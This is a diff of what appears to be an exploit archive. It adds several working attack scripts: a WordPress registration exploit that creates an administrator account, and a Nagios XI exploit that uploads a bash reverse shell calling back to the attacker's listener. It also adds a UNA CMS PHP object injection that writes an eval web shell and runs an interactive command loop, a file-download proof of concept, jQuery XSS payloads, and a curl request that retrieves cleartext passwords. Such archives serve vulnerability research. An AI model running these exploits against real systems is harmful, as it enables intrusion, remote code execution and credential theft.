{"field_name": "user_pass", "value": password, "field_type":
|
||||
"password", "label": "User Password"},
|
||||
{"field_name": "user_confirm_password", "value": password,
|
||||
"field_type": "password", "label": "Confirm Password"},
|
||||
{"value": memval, "field_type": "radio", "label": "membership",
|
||||
"field_name": f"membership_field_{memname}"}
|
||||
]
|
||||
|
||||
payload = {
|
||||
"action": "user_registration_user_form_submit",
|
||||
"security": nonce,
|
||||
"form_data": json.dumps(form_data),
|
||||
"form_id": formid,
|
||||
"registration_language": "en-US",
|
||||
"ur_frontend_form_nonce": front_nonce,
|
||||
"is_membership_active": memval,
|
||||
"membership_type": memval
|
||||
}
|
||||
|
||||
r2 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"),
|
||||
data=payload, timeout=10)
|
||||
|
||||
if '"success":true' not in r2.text:
|
||||
print("[-] Registration form failed.")
|
||||
return
|
||||
|
||||
print("[+] Sending membership registration as administrator...")
|
||||
member_payload = {
|
||||
"action": "user_registration_membership_register_member",
|
||||
"security": loc_nonce,
|
||||
"members_data": json.dumps({
|
||||
"membership": "1",
|
||||
"payment_method": "free",
|
||||
"start_date": "2025-3-29",
|
||||
"username": username,
|
||||
"role": "administrator"
|
||||
})
|
||||
}
|
||||
|
||||
r3 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"),
|
||||
data=member_payload, timeout=10)
|
||||
|
||||
if '"success":true' in r3.text:
|
||||
print("[+] Exploit Successful!")
|
||||
print(f"[+] Admin Username: {username}")
|
||||
print(f"[+] Admin Password: {password}")
|
||||
else:
|
||||
print("[-] Membership escalation failed.")
|
||||
|
||||
except Exception as e:
|
||||
print(f"[-] Exploit failed: {str(e)}")
|
||||
|
||||
if __name__ == "__main__":
|
||||
banner()
|
||||
target = input("Enter target WordPress site (e.g., http://example.com):
|
||||
").strip().rstrip('/')
|
||||
if not target.startswith("http"):
|
||||
target = "http:
|
90
exploits/multiple/webapps/52138.txt
Normal file
90
exploits/multiple/webapps/52138.txt
Normal file
|
@ -0,0 +1,90 @@
|
|||
# Exploit Title: Nagiosxi authenticated Remote Code Execution
|
||||
# Date: 17/02/2024
|
||||
# Exploit Author: Calil Khalil
|
||||
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
|
||||
# Version: Nagios Xi 5.6.6
|
||||
# Tested on: Ubuntu
|
||||
# CVE : CVE-2019-15949
|
||||
|
||||
#
|
||||
# python3 exp.py -t https://<target>/ -b /<nagiosxi-path>/ -u user -p 'password' -lh <rev-ip> -lp <rev-port> -k (ignore cert)
|
||||
#
|
||||
|
||||
import argparse
|
||||
import re
|
||||
import requests
|
||||
import urllib3
|
||||
|
||||
class Nagiosxi():
|
||||
def __init__(self, target, parameter, username, password, lhost, lport, ignore_ssl):
|
||||
self.url = target
|
||||
self.parameter = parameter
|
||||
self.username = username
|
||||
self.password = password
|
||||
self.lhost = lhost
|
||||
self.lport = lport
|
||||
self.ignore_ssl = ignore_ssl
|
||||
self.login()
|
||||
|
||||
def upload(self, session):
|
||||
print("Uploading Malicious Check Ping Plugin")
|
||||
upload_url = self.url + self.parameter + "/admin/monitoringplugins.php"
|
||||
upload_token = session.get(upload_url, verify=not self.ignore_ssl)
|
||||
nsp = re.findall('var nsp_str = "(.*)";', upload_token.text)
|
||||
print("Upload NSP Token: " + nsp[0])
|
||||
payload = "bash -c 'bash -i >& /dev/tcp/" + self.lhost + "/" + self.lport + " 0>&1'"
|
||||
file_data = {
|
||||
"upload": "1",
|
||||
"nsp": nsp[0],
|
||||
"MAX_FILE_SIZE": "20000000"
|
||||
}
|
||||
file_upload = {
|
||||
"uploadedfile": ("check_ping", payload, "application/octet-stream", {"Content-Disposition": "form-data"})
|
||||
}
|
||||
session.post(upload_url, data=file_data, files=file_upload, verify=not self.ignore_ssl)
|
||||
payload_url = self.url + self.parameter + "/includes/components/profile/profile.php?cmd=download"
|
||||
session.get(payload_url, verify=not self.ignore_ssl)
|
||||
|
||||
def login(self):
|
||||
session = requests.Session()
|
||||
login_url = self.url + self.parameter + "/login.php"
|
||||
token = session.get(login_url, verify=not self.ignore_ssl)
|
||||
nsp = re.findall('name="nsp" value="(.*)">', token.text)
|
||||
print("Login NSP Token: " + nsp[0])
|
||||
post_data = {
|
||||
"nsp": nsp[0],
|
||||
"page": "auth",
|
||||
"debug": "",
|
||||
"pageopt": "login",
|
||||
"redirect": "",
|
||||
"username": self.username,
|
||||
"password": self.password,
|
||||
"loginButton": ""
|
||||
}
|
||||
login = session.post(login_url, data=post_data, verify=not self.ignore_ssl)
|
||||
if "Home Dashboard" in login.text:
|
||||
print("Logged in!")
|
||||
else:
|
||||
print("Unable to login!")
|
||||
self.upload(session)
|
||||
|
||||
if __name__ == "__main__":
|
||||
parser = argparse.ArgumentParser(description='CVE-2019–15949 Nagiosxi authenticated Remote Code Execution')
|
||||
parser.add_argument('-t', metavar='<Target base URL>', help='Example: -t http://nagios.url/', required=True)
|
||||
parser.add_argument('-b', metavar='<Base Directory>', help="Example: -b /nagiosxi/", required=True)
|
||||
parser.add_argument('-u', metavar='<Username>', help="Example: -a username", required=True)
|
||||
parser.add_argument('-p', metavar='<Password>', help="Example: -p 'password'", required=True)
|
||||
parser.add_argument('-lh', metavar='<Listener IP>', help="Example: -lh 127.0.0.1", required=True)
|
||||
parser.add_argument('-lp', metavar='<Listener Port>', help="Example: -lp 1337", required=True)
|
||||
parser.add_argument('-k', action='store_true', help="Ignore SSL certificate verification")
|
||||
args = parser.parse_args()
|
||||
|
||||
|
||||
urllib3.disable_warnings()
|
||||
|
||||
try:
|
||||
print('CVE-2019-15949 Nagiosxi authenticated Remote Code Execution')
|
||||
Nagiosxi(args.t, args.b, args.u, args.p, args.lh, args.lp, args.k)
|
||||
except KeyboardInterrupt:
|
||||
print("\nBye Bye!")
|
||||
exit()
|
125
exploits/multiple/webapps/52139.txt
Normal file
125
exploits/multiple/webapps/52139.txt
Normal file
|
@ -0,0 +1,125 @@
|
|||
# Exploit Title: UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
|
||||
# Author: Egidio Romano aka EgiX
|
||||
# Software link.......: https://unacms.com
|
||||
|
||||
|
||||
[-] Software Links:
|
||||
https://unacms.com
|
||||
https://github.com/unacms/una
|
||||
|
||||
[-] Affected Versions:
|
||||
All versions from 9.0.0-RC1 to 14.0.0-RC4.
|
||||
|
||||
[-] Vulnerability Description:
|
||||
The vulnerability is located in the
|
||||
/template/scripts/BxBaseMenuSetAclLevel.php script. Specifically,
|
||||
within the BxBaseMenuSetAclLevel::getCode() method. When calling this
|
||||
method, user input passed through the "profile_id" POST parameter is
|
||||
not properly sanitized before being used in a call to the
|
||||
unserialize() PHP function. This can be exploited by remote,
|
||||
unauthenticated attackers to inject arbitrary PHP objects into the
|
||||
application scope, allowing them to perform a variety of attacks, such
|
||||
as writing and executing arbitrary PHP code.
|
||||
|
||||
<?php
|
||||
|
||||
/*
|
||||
------------------------------------------------------------------------------------
|
||||
UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
|
||||
------------------------------------------------------------------------------------
|
||||
|
||||
author..............: Egidio Romano aka EgiX
|
||||
mail................: n0b0d13s[at]gmail[dot]com
|
||||
software link.......: https://unacms.com
|
||||
|
||||
+-------------------------------------------------------------------------+
|
||||
| This proof of concept code was written for educational purpose only. |
|
||||
| Use it at your own risk. Author will be not responsible for any damage. |
|
||||
+-------------------------------------------------------------------------+
|
||||
|
||||
[-] Vulnerability Description:
|
||||
|
||||
The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script.
|
||||
Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this
|
||||
method, user input passed through the "profile_id" POST parameter is not properly
|
||||
sanitized before being used in a call to the unserialize() PHP function. This can be
|
||||
exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into
|
||||
the application scope, allowing them to perform a variety of attacks, such as
|
||||
writing and executing arbitrary PHP code.
|
||||
|
||||
[-] Original Advisory:
|
||||
|
||||
https://karmainsecurity.com/KIS-2025-01
|
||||
*/
|
||||
|
||||
set_time_limit(0);
|
||||
error_reporting(E_ERROR);
|
||||
|
||||
print "\n+------------------------------------------------------------+";
|
||||
print "\n| UNA CMS <= 14.0.0-RC4 PHP Object Injection Exploit by EgiX |";
|
||||
print "\n+------------------------------------------------------------+\n";
|
||||
|
||||
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
|
||||
|
||||
if ($argc != 2)
|
||||
{
|
||||
print "\nUsage......: php $argv[0] <URL>\n";
|
||||
print "\nExample....: php $argv[0] http://localhost/una/";
|
||||
print "\nExample....: php $argv[0] https://unacms.com/\n\n";
|
||||
die();
|
||||
}
|
||||
|
||||
define('ON_APACHE', true);
|
||||
define('SH_PATH', ON_APACHE ? './cache_public/sh.phtml' : './cache_public/sh.php');
|
||||
|
||||
class GuzzleHttp_Cookie_SetCookie
|
||||
{
|
||||
private $data = ['Expires' => '', 'Value' => '<?php eval(base64_decode($_SERVER[\'HTTP_C\'])); ?>'];
|
||||
}
|
||||
|
||||
class GuzzleHttp_Cookie_FileCookieJar
|
||||
{
|
||||
private $cookies, $filename = SH_PATH, $storeSessionCookies = true;
|
||||
|
||||
function __construct()
|
||||
{
|
||||
$this->cookies = [new GuzzleHttp_Cookie_SetCookie];
|
||||
}
|
||||
}
|
||||
|
||||
$url = $argv[1];
|
||||
$ch = curl_init();
|
||||
|
||||
$chain = serialize(new GuzzleHttp_Cookie_FileCookieJar);
|
||||
$chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain);
|
||||
$chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain);
|
||||
|
||||
curl_setopt($ch, CURLOPT_URL, "{$url}menu.php");
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
|
||||
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
|
||||
curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS, "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=" . urlencode($chain));
|
||||
|
||||
print "\n[+] Performing PHP Object Injection";
|
||||
|
||||
curl_exec($ch); curl_close($ch);
|
||||
|
||||
print "\n[+] Launching shell\n";
|
||||
|
||||
$ch = curl_init();
|
||||
|
||||
curl_setopt($ch, CURLOPT_URL, $url . SH_PATH);
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
|
||||
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
|
||||
|
||||
$phpcode = "print '____'; print shell_exec(base64_decode('%s')); print '____';";
|
||||
|
||||
while(1)
|
||||
{
|
||||
print "\nuna-shell# ";
|
||||
if (($cmd = trim(fgets(STDIN))) == "exit") break;
|
||||
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
|
||||
preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
|
||||
}
|
71
exploits/multiple/webapps/52140.txt
Normal file
71
exploits/multiple/webapps/52140.txt
Normal file
|
@ -0,0 +1,71 @@
|
|||
# Exploit Title: Jasmin Ransomware - (Authenticated) Arbitrary File Download
|
||||
# Google Dork: N/A
|
||||
# Date: 22-03-2025
|
||||
# Exploit Author: bRpsd cy[at]live.no
|
||||
# Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
|
||||
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
|
||||
# Version: N/A
|
||||
# Tested on: MacOS local xampp
|
||||
|
||||
|
||||
Authentication can be easily bypassed due to SQL Injection as mentioned in:
|
||||
https://www.exploit-db.com/exploits/52091
|
||||
|
||||
|
||||
|
||||
Vulnerable file:Web Panel/download_file.php
|
||||
Vulnerable parameter:file
|
||||
Vulnerable code:
|
||||
<?php
|
||||
session_start();
|
||||
if(!isset($_SESSION['username']) ){
|
||||
header("Location: login.php");
|
||||
}
|
||||
$file=$_GET['file'];
|
||||
if(!empty($file)){
|
||||
// Define headers
|
||||
header("Cache-Control: public");
|
||||
header("Content-Description: File Transfer");
|
||||
header("Content-Disposition: attachment; filename=$file");
|
||||
header("Content-Type: text/encoded");
|
||||
header("Content-Transfer-Encoding: binary");
|
||||
|
||||
// Read the file
|
||||
readfile($file);
|
||||
exit;
|
||||
}else{
|
||||
echo 'The file does not exist.';
|
||||
}
|
||||
?>
|
||||
|
||||
|
||||
Proof of concept:
|
||||
|
||||
http://localhost/Jasmin-Ransomware/Web Panel/download_file.php?file=database/db_conection.php
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br, zstd
|
||||
Connection: keep-alive
|
||||
Cookie: PHPSESSID=88e519f73f9013f560ed3f0514015d8c
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-Fetch-Dest: document
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-Site: none
|
||||
Sec-Fetch-User: ?1
|
||||
|
||||
GET: HTTP/1.1 200 OK
|
||||
Date: Sat, 22 Mar 2025 09:42:09 GMT
|
||||
Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1
|
||||
X-Powered-By: PHP/7.4.29
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: public
|
||||
Pragma: no-cache
|
||||
Content-Description: File Transfer
|
||||
Content-Disposition: attachment; filename=database/db_conection.php
|
||||
Content-Transfer-Encoding: binary
|
||||
Content-Length: 95
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/encoded;charset=UTF-8
|
72
exploits/multiple/webapps/52141.txt
Normal file
72
exploits/multiple/webapps/52141.txt
Normal file
|
@ -0,0 +1,72 @@
|
|||
# Exploit Title: jQuery Prototype Pollution & XSS Exploit (CVE-2019-11358 & CVE-2020-7656)
|
||||
# Google Dork: N/A
|
||||
# Date: 2025-02-13
|
||||
# Exploit Author: xOryus
|
||||
# Vendor Homepage: https://jquery.com
|
||||
# Software Link: https://code.jquery.com/jquery-3.3.1.min.js
|
||||
# Version: 3.3.1
|
||||
# Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112
|
||||
# CVE : CVE-2019-11358, CVE-2020-7656
|
||||
# Category: WebApps
|
||||
|
||||
# Description:
|
||||
# This exploit abuses two vulnerabilities in jQuery:
|
||||
# - CVE-2020-7656: XSS via improper script handling
|
||||
# - CVE-2019-11358: Prototype Pollution leading to XSS
|
||||
# By injecting payloads into a vulnerable page using jQuery <3.4.X, attackers can execute arbitrary JavaScript in the victim's browser.
|
||||
#
|
||||
# Usage:
|
||||
# 1. Load this script in a page that includes jQuery 3.3.1
|
||||
# 2. Observe two XSS alerts via script injection and prototype pollution.
|
||||
|
||||
# PoC (Proof of Concept):
|
||||
# ------------------------------------
|
||||
|
||||
/*
|
||||
* Exploit for CVE-2020-7656 and CVE-2019-11358
|
||||
* Injects malicious JavaScript into a vulnerable page using jQuery <3.4.X
|
||||
*/
|
||||
|
||||
COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12)
|
||||
|
||||
// 1. Load vulnerable jQuery (version 3.3.1)
|
||||
const script = document.createElement('script');
|
||||
script.src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js";
|
||||
document.head.appendChild(script);
|
||||
|
||||
// 2. Function to execute after jQuery is loaded
|
||||
script.onload = function() {
|
||||
console.log("[+] Vulnerable jQuery loaded!");
|
||||
|
||||
// 3. Inject malicious content for XSS (CVE-2020-7656)
|
||||
const maliciousContent = "<script>alert('XSS via CVE-2020-7656: ' + document.domain)</script >"; // Space after </script>
|
||||
$('body').append(maliciousContent);
|
||||
console.log("[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed.");
|
||||
|
||||
// 4. Exploit Prototype Pollution (CVE-2019-11358)
|
||||
const defaultConfig = {
|
||||
"backLink": "<a href='https://example.com'>Go Back</a>"
|
||||
};
|
||||
|
||||
const maliciousParams = {
|
||||
"__proto__": {
|
||||
"backLink": "<svg onload=alert('XSS via CVE-2019-11358: Prototype Pollution!')>"
|
||||
}
|
||||
};
|
||||
|
||||
// 5. Merge objects using vulnerable $.extend
|
||||
let config = $.extend(true, defaultConfig, maliciousParams);
|
||||
console.log("[+] Prototype Pollution executed via $.extend().");
|
||||
|
||||
// 6. Create a container to inject malicious content
|
||||
const container = document.createElement('div');
|
||||
container.id = 'backLinkContainer';
|
||||
document.body.appendChild(container);
|
||||
|
||||
// 7. Inject malicious content into the DOM
|
||||
$('#backLinkContainer').html(config.backLink);
|
||||
console.log("[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed.");
|
||||
};
|
||||
|
||||
// 8. Instruction message
|
||||
console.log("[*] Script injected. Waiting for jQuery to load...");
|
46
exploits/multiple/webapps/52144.txt
Normal file
46
exploits/multiple/webapps/52144.txt
Normal file
|
@ -0,0 +1,46 @@
|
|||
# Exploit Title: Information Disclosure in GeoVision GV-ASManager
|
||||
# Google Dork: inurl:"ASWeb/Login"
|
||||
# Date: 02-FEB-2025
|
||||
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
|
||||
# Vendor Homepage: https://www.geovision.com.tw/
|
||||
# Software Link: https://www.geovision.com.tw/download/product/
|
||||
# Version: 6.1.0.0 or less
|
||||
# Tested on: Windows 10 | Kali Linux
|
||||
# CVE : CVE-2024-56902
|
||||
# PoC: https://github.com/DRAGOWN/CVE-2024-56902
|
||||
|
||||
|
||||
Information disclosure vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.
|
||||
|
||||
Requirements
|
||||
To perform successful attack an attacker requires:
|
||||
- GeoVision ASManager version 6.1.0.0 or less
|
||||
- Network access to the GV-ASManager web application (there are cases when there are public access)
|
||||
- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)
|
||||
|
||||
Impact
|
||||
The vulnerability can be leveraged to perform the following unauthorized actions:
|
||||
A low privilege account is able to:
|
||||
- Enumerate user accounts
|
||||
- Retrieve cleartext password of any account in GV-ASManager.
|
||||
After reusing the retrieved password, an attacker will be able to:
|
||||
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
|
||||
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
|
||||
- Disrupt and disconnect services such as monitoring cameras, access controls.
|
||||
- Clone and duplicate access control data for further attack scenarios.
|
||||
- Reusing retrieved password in other digital assets of the organization.
|
||||
|
||||
cURL script:
|
||||
|
||||
curl --path-as-is -i -s -k -X $'POST' \
|
||||
-H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: */*' -H $'Origin: https://192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \
|
||||
-b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
|
||||
--data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \
|
||||
$'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'
|
||||
|
||||
|
||||
After a successful attack, you will get access to:
|
||||
- ASWeb - Access & Security Management
|
||||
- TAWeb - Time and Attendance Management
|
||||
- VMWeb - Visitor Management
|
||||
- ASManager - Access & Security Management software in OS
|
|
@ -11031,6 +11031,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
35729,exploits/multiple/remote/35729.txt,"Imperva SecureSphere - SQL Query Filter Security Bypass",2011-05-09,@drk1wi,remote,multiple,,2011-05-09,2015-01-08,1,,,,,,https://www.securityfocus.com/bid/47780/info
|
||||
39455,exploits/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,remote,multiple,,2016-02-18,2016-02-18,0,CVE-2015-2080,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php
|
||||
46342,exploits/multiple/remote/46342.py,"Indusoft Web Studio 8.1 SP2 - Remote Code Execution",2019-02-11,"Jacob Baines",remote,multiple,,2019-02-11,2019-02-12,0,CVE-2019-6545;CVE-2019-6543,,,,,
|
||||
52142,exploits/multiple/remote/52142.py,"InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation",2025-04-08,"Andrea Pasin",remote,multiple,,2025-04-08,2025-04-08,0,CVE-2024-30896,,,,,
|
||||
30973,exploits/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution",2008-01-02,"Rich Cannings",remote,multiple,,2008-01-02,2014-01-16,1,CVE-2008-6060;OSVDB-56437,,,,,https://www.securityfocus.com/bid/27109/info
|
||||
21942,exploits/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",remote,multiple,,2002-10-15,2012-10-13,1,CVE-2002-1910;OSVDB-59780,,,,,https://www.securityfocus.com/bid/5970/info
|
||||
20468,exploits/multiple/remote/20468.txt,"Inktomi Search Software 3.0 - Information Disclosure",2000-12-05,"china nsl",remote,multiple,,2000-12-05,2012-08-13,1,OSVDB-88577,,,,,https://www.securityfocus.com/bid/2062/info
|
||||
|
@ -11486,6 +11487,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,,2008-05-08,2014-02-19,1,CVE-2008-2162;OSVDB-45017,,,,,https://www.securityfocus.com/bid/29107/info
|
||||
24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,remote,multiple,,2013-01-24,2013-01-24,1,CVE-2013-1359;OSVDB-89347,"Metasploit Framework (MSF)",,,,
|
||||
21453,exploits/multiple/remote/21453.txt,"SonicWALL SOHO3 6.3 - Content Blocking Script Injection",2002-05-17,"E M",remote,multiple,,2002-05-17,2012-09-22,1,CVE-2002-2341;OSVDB-4408,,,,,https://www.securityfocus.com/bid/4755/info
|
||||
52143,exploits/multiple/remote/52143.py,"Sony XAV-AX5500 1.13 - Firmware Update Validation Remote Code Execution (RCE)",2025-04-08,lkushinada,remote,multiple,,2025-04-08,2025-04-08,0,CVE-2024-23922,,,,,
|
||||
22509,exploits/multiple/remote/22509.txt,"Sophos Products - Multiple Vulnerabilities",2012-11-05,"Tavis Ormandy",remote,multiple,,2012-11-05,2012-11-05,1,OSVDB-87063;OSVDB-87062;OSVDB-87061;OSVDB-87060;OSVDB-87059;OSVDB-87058;OSVDB-87057;OSVDB-87056,,,,,
|
||||
48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple,,2020-06-15,2020-06-15,0,CVE-2020-12712,,,,,
|
||||
50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",2022-06-14,Altelus,remote,multiple,,2022-06-14,2022-06-14,0,CVE-2022-23642,,,,,
|
||||
|
@ -11926,6 +11928,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
|
||||
50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
|
||||
37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
|
||||
52144,exploits/multiple/webapps/52144.txt,"GeoVision GV-ASManager 6.1.0.0 - Information Disclosure",2025-04-08,"Giorgi Dograshvili",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2024-56902,,,,,
|
||||
50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,,2021-08-05,2021-08-05,0,,,,,,
|
||||
47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,,2019-09-23,2019-09-23,0,CVE-2019-16679,,,,http://www.exploit-db.comgila-1.10.9.zip,
|
||||
49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,,2021-02-18,2021-06-14,0,,,,,,
|
||||
|
@ -11997,6 +12000,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
49372,exploits/multiple/webapps/49372.txt,"IPeakCMS 3.5 - Boolean-based blind SQLi",2021-01-06,MoeAlBarbari,webapps,multiple,,2021-01-06,2021-01-06,0,CVE-2021-3018,,,,,
|
||||
50490,exploits/multiple/webapps/50490.txt,"Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)",2021-11-03,Vulnerability-Lab,webapps,multiple,,2021-11-03,2021-11-03,0,,,,,,
|
||||
52062,exploits/multiple/webapps/52062.py,"Ivanti vADC 9.9 - Authentication Bypass",2024-08-04,ohnoisploited,webapps,multiple,,2024-08-04,2024-08-04,0,,,,,,
|
||||
52140,exploits/multiple/webapps/52140.txt,"Jasmin Ransomware - Arbitrary File Download (Authenticated)",2025-04-08,bRpsd,webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
|
||||
44623,exploits/multiple/webapps/44623.txt,"JasperReports - (Authenticated) File Read",2018-05-03,"Hector Monsegur",webapps,multiple,,2018-05-15,2018-05-15,0,CVE-2018-5430,,,,,https://rhinosecuritylabs.com/application-security/authenticated-file-read-vulnerability-in-jasperreports/
|
||||
36575,exploits/multiple/webapps/36575.py,"JBoss AS 3/4/5/6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",webapps,multiple,,2015-04-13,2015-04-13,0,OSVDB-120064,,,,,
|
||||
35911,exploits/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117568;OSVDB-117567;CVE-2015-1478;CVE-2015-1477,,,,,
|
||||
|
@ -12018,6 +12022,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
48147,exploits/multiple/webapps/48147.txt,"Joplin Desktop 1.0.184 - Cross-Site Scripting",2020-03-02,"Javier Olmedo",webapps,multiple,,2020-03-02,2020-03-02,0,CVE-2020-9038,,,,,
|
||||
49767,exploits/multiple/webapps/49767.txt,"jQuery 1.0.3 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,,2021-04-14,2021-04-14,0,CVE-2020-11023,,,,,
|
||||
49766,exploits/multiple/webapps/49766.txt,"jQuery 1.2 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,,2021-04-14,2021-04-14,0,CVE-2020-11022,,,,,
|
||||
52141,exploits/multiple/webapps/52141.txt,"jQuery 3.3.1 - Prototype Pollution & XSS Exploit",2025-04-08,xOryus,webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2020-7656;CVE-2019-11358,,,,,
|
||||
11218,exploits/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Arbitrary File Upload",2010-01-21,k4cp3r/Ablus,webapps,multiple,,2010-01-20,,1,,,,,http://www.exploit-db.comjquery.uploadify-v2.1.0.zip,
|
||||
38641,exploits/multiple/webapps/38641.rb,"JSSE - SKIP-TLS",2015-11-05,"Ramon de C Valle",webapps,multiple,,2015-11-05,2015-11-05,0,CVE-2014-6593;OSVDB-117238,,,,,
|
||||
38424,exploits/multiple/webapps/38424.txt,"Kallithea 0.2.9 - 'came_from' HTTP Response Splitting",2015-10-08,LiquidWorm,webapps,multiple,,2015-10-11,2015-10-11,0,CVE-2015-5285,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php
|
||||
|
@ -12112,6 +12117,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
